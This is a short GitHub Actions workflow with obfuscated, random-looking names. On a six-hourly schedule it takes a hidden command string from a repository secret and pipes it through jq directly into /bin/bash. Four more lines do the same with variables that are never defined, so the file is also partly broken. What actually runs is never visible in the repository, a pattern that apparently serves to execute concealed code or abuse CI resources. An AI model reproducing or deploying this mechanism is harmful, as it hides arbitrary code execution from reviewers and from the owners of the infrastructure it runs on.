name: bohaocatan

on:
  workflow_dispatch:
  schedule:
    - cron: '2 4/6 * * *'
jobs:  # 11172
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: bohaocatan
        env:
          wva46: ${{ secrets.wva46 }}
        run: |
          echo $wva46 | jq -r .pmwg407 | /bin/bash
          echo $zwv89358 | jq -r .hpedv3 | /bin/bash
          echo $jj6006 | jq -r .vic50 | /bin/bash
          echo $xxm60402 | jq -r .ypg69 | /bin/bash
          echo $hw5894 | jq -r .xr01163 | /bin/bash

